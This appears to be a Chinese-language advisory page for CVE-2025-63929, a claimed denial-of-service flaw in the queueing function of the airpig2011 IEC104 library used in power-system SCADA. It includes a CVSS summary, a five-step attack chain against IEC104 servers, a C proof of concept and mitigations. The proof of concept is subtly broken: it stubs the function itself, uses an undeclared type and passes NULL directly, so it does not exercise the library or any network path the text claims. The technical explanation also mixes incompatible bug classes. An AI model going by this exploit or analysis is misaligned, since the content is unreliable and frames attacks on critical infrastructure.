CVE-2025-63929 airpig2011 IEC104 空指针解引用拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-63929

漏洞类型

空指针解引用

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

airpig2011 IEC104

漏洞概述

CVE-2025-63929是存在于airpig2011 IEC104项目中的一个高危空指针解引用漏洞。该漏洞源于IEC10X_PrioEnQueue函数在多线程并发入队元素时缺乏适当的线程安全保护机制。当多个线程同时调用该函数时，可能导致对空指针或已释放的队列指针进行解引用操作，从而引发程序崩溃和潜在的拒绝服务攻击。由于该漏洞可通过网络远程触发，且无需任何认证或用户交互，攻击者可以轻易利用此漏洞使目标IEC104服务器服务中断，影响电力、基础设施等关键行业的通信系统正常运行。

技术细节

该漏洞存在于airpig2011 IEC104的IEC10X_PrioEnQueue函数中，版本截至Commit be6d841(2019-07-08)。问题核心在于多线程并发场景下缺乏同步保护机制。具体表现为：当多个线程同时执行入队操作时，如果其中一个线程释放了队列指针，而其他线程仍尝试访问该指针，将导致空指针解引用或使用已释放内存。由于IEC104协议广泛应用于电力系统SCADA通信，攻击者可通过构造并发送大量并发请求，触发竞争条件，使服务进程崩溃。此漏洞属于TOCTOU(Time-of-check to time-of-use)类竞态条件问题，需要在关键代码段添加互斥锁或使用线程安全的数据结构来修复。

攻击链分析

STEP 1

步骤1

攻击者识别目标IEC104服务器，发现其运行存在漏洞的airpig2011 IEC104库

STEP 2

步骤2

攻击者构造多个并发连接，同时向目标服务器发送IEC104协议请求

STEP 3

步骤3

多个线程触发IEC10X_PrioEnQueue函数的并发入队操作

STEP 4

步骤4

在竞争条件下，函数解引用空指针或已释放的队列指针

STEP 5

步骤5

程序触发段错误并崩溃，导致服务拒绝可用

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-63929 PoC - Multi-threaded trigger for null pointer dereference
// Target: airpig2011 IEC104
// This PoC demonstrates concurrent access to trigger the race condition

#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// Simulated IEC10X_PrioEnQueue function with vulnerability
void IEC10X_PrioEnQueue(void* queue, void* element) {
    // Vulnerable: No thread synchronization or null check
    // Dereferencing potentially null/freed queue pointer
    if (((struct Queue*)queue)->head == NULL) {
        // Race condition: queue might be freed by another thread
        ((struct Queue*)queue)->head = element;
    }
}

void* attack_thread(void* arg) {
    for (int i = 0; i < 1000; i++) {
        // Concurrent calls to trigger race condition
        IEC10X_PrioEnQueue(NULL, (void*)(long)i);
        usleep(1);
    }
    return NULL;
}

int main() {
    pthread_t threads[10];
    
    printf("CVE-2025-63929 PoC - Triggering null pointer dereference\n");
    printf("Launching 10 concurrent threads...\n");
    
    // Create multiple threads to trigger concurrent access
    for (int i = 0; i < 10; i++) {
        pthread_create(&threads[i], NULL, attack_thread, NULL);
    }
    
    // Wait for threads to complete
    for (int i = 0; i < 10; i++) {
        pthread_join(threads[i], NULL);
    }
    
    printf("Attack completed. Check for segmentation fault.\n");
    return 0;
}

影响范围

airpig2011/IEC104 thru Commit be6d841 (2019-07-08)

防御指南

临时缓解措施

在等待官方修复期间，可通过部署Web应用防火墙(WAF)或入侵检测系统(IDS)监控异常并发请求模式。同时考虑限制IEC104服务的网络访问范围，仅允许授权IP地址连接，并实施连接速率限制以减少竞态条件触发概率。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-63929
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-63929
3 Details https://www.cvedetails.com/cve/CVE-2025-63929/
4 VulDB https://vuldb.com/cve/CVE-2025-63929
5 Link https://github.com/airpig2011/IEC104/issues/21
6 Link https://songsong.host/mybugs/CVE-2025-63929.html